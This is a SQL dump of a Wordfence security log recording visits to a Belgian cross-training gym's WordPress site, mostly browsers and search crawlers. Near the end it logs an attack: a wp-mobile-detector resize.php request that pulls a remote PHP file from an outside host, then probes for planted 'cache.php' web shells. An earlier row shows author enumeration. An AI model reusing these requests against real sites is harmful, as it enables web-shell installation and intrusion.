(77182, 1499858931.412251, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77183, 1499858931.897522, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77184, 1499858932.413343, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77185, 1499863503.784927, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77186, 1499868686.977125, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77187, 1499868687.505903, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77188, 1499869932.403585, 1532393936, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77189, 1499881332.002307, 2637637429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77190, 1499883277.473062, 2509962753, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77191, 1499886822.797156, 676177742, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77192, 1499888442.311924, 1332604279, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(77193, 1499891992.610922, 3325718858, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/forum.php', 'http://crosstrainingcenter.be/forum.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(77194, 1499892500.250771, 2637637530, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77195, 1499892500.995103, 2637637530, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77196, 1499893542.869709, 584303793, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=2', '', ''),
(77197, 1499912058.186765, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(77198, 1499919266.446441, 2760155461, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77199, 1499920168.573780, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77200, 1499921397.146341, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/css/tipsy.css', 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/css/tipsy.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(77201, 1499926167.760377, 1123632580, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77202, 1499926168.246261, 1123632580, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77203, 1499927706.705724, 1123632580, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77204, 1499936673.534614, 3024883592, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(77205, 1499936673.632421, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(77206, 1499936673.865960, 3024883605, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(77207, 1499936838.437272, 1123632580, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77208, 1499939423.969713, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77209, 1499943389.994130, 1332604279, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(77210, 1499944327.389097, 3250483965, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77211, 1499944328.791713, 3250483965, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77212, 1499948759.407544, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77213, 1499948761.808476, 520974916, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(77214, 1499948762.981804, 1463821037, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77215, 1499948773.208025, 1463821037, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77216, 1499948792.300967, 1463821037, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77217, 1499948802.799729, 1463821037, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/100.0.0.43.70;FBBV/64200226;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/Proximus;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(77218, 1499952256.125016, 3154453301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77219, 1499952256.915242, 3154453301, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77220, 1499952257.381379, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77221, 1499952257.914221, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77222, 1499952258.367458, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77223, 1499952258.875908, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77224, 1499952259.420047, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77225, 1499952259.876426, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77226, 1499952260.357721, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77227, 1499952260.817224, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77228, 1499952261.275184, 3154453301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77229, 1499957038.215342, 2637637429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77230, 1499959743.365289, 3024883465, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(77231, 1499960403.761678, 3154453301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77232, 1499960750.934437, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77233, 1499960751.405893, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77234, 1499960751.983472, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77235, 1499960752.838192, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77236, 1499960753.425401, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77237, 1499960753.927197, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77238, 1499960754.460294, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(77239, 1499960755.114121, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77240, 1499960755.657715, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77241, 1499960756.088524, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77242, 1499960756.708875, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77243, 1499960757.338692, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77244, 1499960757.847955, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77245, 1499960758.373598, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77246, 1499962555.283545, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77247, 1499965085.742983, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77248, 1499968355.265529, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77249, 1499968525.428999, 1123634077, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77250, 1499970501.079174, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77251, 1499970501.672314, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77252, 1499970502.332263, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77253, 1499970502.814649, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77254, 1499970503.222071, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77255, 1499970503.706529, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77256, 1499970504.247993, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77257, 1499970504.725126, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77258, 1499970505.173638, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77259, 1499970505.692731, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77260, 1499970506.189495, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77261, 1499973285.953749, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77262, 1499976492.930811, 3264835941, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(77263, 1499976493.651984, 3264835941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(77264, 1499976494.188621, 3264835941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(77265, 1499976494.595972, 3264835941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(77266, 1499981918.124314, 3657082077, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77267, 1499982839.431530, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77268, 1499983157.160901, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77269, 1499983158.722524, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77270, 1499983160.449314, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77271, 1499983162.362943, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77272, 1499983164.604777, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77273, 1499983167.653090, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77274, 1499983170.939882, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77275, 1499983174.150760, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77276, 1499983178.247992, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(77277, 1499984983.263119, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77278, 1499986520.481365, 2957688868, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77279, 1499986522.218084, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77280, 1499986523.198547, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77281, 1499986525.351279, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77282, 1499986526.305627, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77283, 1499986526.307888, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77284, 1499986526.309415, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77285, 1499986527.428259, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77286, 1499986527.456070, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77287, 1499986527.457868, 2957688868, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'DomainCrawler/3.0 (info@domaincrawler.com; http://www.domaincrawler.com/crosstrainingcenter.be)'),
(77288, 1499992053.858162, 676177789, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77289, 1499992638.375462, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77290, 1499995152.804793, 3657082077, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(77291, 1500000741.723350, 2637637429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77292, 1500006087.516093, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77293, 1500007444.688405, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77294, 1500007445.070198, 2303381409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77295, 1500012307.881760, 3373404845, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77296, 1500012309.299992, 3373404845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.laptopscreenrepair.net.au/search/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77297, 1500012310.133221, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/cache/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77298, 1500012311.801212, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/cache.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77299, 1500012313.065446, 3373404845, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
